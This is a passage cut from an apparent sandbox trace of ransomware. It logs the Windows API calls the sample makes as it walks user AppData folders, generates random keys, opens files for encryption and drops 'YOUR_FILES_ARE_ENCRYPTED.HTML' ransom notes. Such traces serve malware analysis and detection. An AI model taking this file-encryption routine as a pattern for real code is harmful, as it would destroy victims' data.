lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x7690008, ftCreationTime.dwLowDateTime=0x74ea008, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebd8a8, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="\x08ݩ")) returned 0xffffffff [0170.224] GetProcessHeap () returned 0x270000 [0170.225] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 
[0170.226] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xbc868a8e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0xbd7c4, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0170.226] lstrcmpW (lpString1="IconCache.db", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.226] PathFindExtensionW (pszPath="IconCache.db") returned=".db" [0170.226] lstrlenW (lpString=".db") returned 3 [0170.226] PathFindExtensionW (pszPath="IconCache.db") returned=".db" [0170.226] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0170.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5fc [0170.226] GetFileSizeEx (in: hFile=0x5fc, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=776132) returned 1 [0170.227] GetProcessHeap () returned 0x270000 [0170.227] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7759008 [0170.230] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="A1") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="A9") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="CC") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="31") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="DE") returned 2 
[0170.230] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="24") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="42") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="FB") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="9D") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="F5") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="A5") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="99") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="4B") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="8C") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="C6") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F7") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="BF") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="16") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="63") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="34") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="0B") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="2F") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="19") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="B3") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="AB") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="2E") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: 
param_1="14") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="08") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="D8") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="33") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="73") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="55") returned 2 [0170.232] lstrcpyW (in: lpString1=0x77690bc, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" [0170.232] CreateIoCompletionPort (FileHandle=0x5fc, ExistingCompletionPort=0x3a0, CompletionKey=0x7759008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.232] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7759008, lpOverlapped=0x7759008) returned 1 [0170.232] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa03a7ee, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0170.232] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft") returned 44 [0170.232] GetProcessHeap () returned 0x270000 [0170.233] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0170.233] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft" | 
out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft" [0170.233] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*" [0170.233] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa03a7ee, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.240] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa03a7ee, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0170.241] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Credentials", 
cAlternateFileName="CREDEN~1")) returned 1 [0170.241] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials") returned 56 [0170.241] GetProcessHeap () returned 0x270000 [0170.241] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75aa008 [0170.249] lstrcpyW (in: lpString1=0x75aa008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials" [0170.249] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\*" [0170.249] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.251] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", 
cAlternateFileName="")) returned 1 [0170.251] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0170.251] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.251] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0170.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\credentials\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0170.252] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0170.258] CloseHandle (hObject=0x5fc) returned 1 [0170.259] GetProcessHeap () returned 0x270000 [0170.259] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0170.260] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, 
ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Feeds", cAlternateFileName="")) returned 1 [0170.260] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds") returned 50 [0170.260] GetProcessHeap () returned 0x270000 [0170.260] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0170.260] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds" [0170.260] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\*" [0170.260] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.263] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, 
ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.263] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad77f44, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x60, cFileName="FeedsStore.feedsdb-ms", cAlternateFileName="FEEDSS~1.FEE")) returned 1 [0170.263] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 72 [0170.263] lstrcmpW (lpString1="FeedsStore.feedsdb-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.263] PathFindExtensionW (pszPath="FeedsStore.feedsdb-ms") returned=".feedsdb-ms" [0170.263] lstrlenW (lpString=".feedsdb-ms") returned 11 [0170.263] PathFindExtensionW (pszPath="FeedsStore.feedsdb-ms") returned=".feedsdb-ms" [0170.263] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab88d60, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft Feeds~", cAlternateFileName="MICROS~1")) returned 1 [0170.263] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 67 [0170.263] GetProcessHeap () returned 
0x270000 [0170.263] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.263] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~" [0170.263] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*" [0170.263] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab88d60, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.270] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab88d60, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.270] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a9bfcdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft at Home~.feed-ms", cAlternateFileName="MICROS~2.FEE")) returned 1 [0170.270] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 94 [0170.270] lstrcmpW (lpString1="Microsoft at Home~.feed-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.270] PathFindExtensionW (pszPath="Microsoft at Home~.feed-ms") returned=".feed-ms" [0170.270] lstrlenW (lpString=".feed-ms") returned 8 [0170.271] PathFindExtensionW (pszPath="Microsoft at Home~.feed-ms") returned=".feed-ms" [0170.271] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft at Work~.feed-ms", cAlternateFileName="MICROS~1.FEE")) returned 1 [0170.271] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 94 [0170.271] lstrcmpW (lpString1="Microsoft at Work~.feed-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.271] PathFindExtensionW (pszPath="Microsoft at Work~.feed-ms") returned=".feed-ms" [0170.271] lstrlenW (lpString=".feed-ms") returned 8 
[0170.271] PathFindExtensionW (pszPath="Microsoft at Work~.feed-ms") returned=".feed-ms" [0170.271] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSNBC News~.feed-ms", cAlternateFileName="MSNBCN~1.FEE")) returned 1 [0170.271] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 87 [0170.271] lstrcmpW (lpString1="MSNBC News~.feed-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.271] PathFindExtensionW (pszPath="MSNBC News~.feed-ms") returned=".feed-ms" [0170.271] lstrlenW (lpString=".feed-ms") returned 8 [0170.271] PathFindExtensionW (pszPath="MSNBC News~.feed-ms") returned=".feed-ms" [0170.271] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSNBC News~.feed-ms", cAlternateFileName="MSNBCN~1.FEE")) returned 0 [0170.271] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.272] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\YOUR_FILES_ARE_ENCRYPTED.HTML") 
returned 97 [0170.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0170.275] WriteFile (in: hFile=0x604, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.277] CloseHandle (hObject=0x604) returned 1 [0170.277] GetProcessHeap () returned 0x270000 [0170.278] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.278] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 1 [0170.278] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 90 [0170.278] GetProcessHeap () returned 0x270000 [0170.278] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.278] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: 
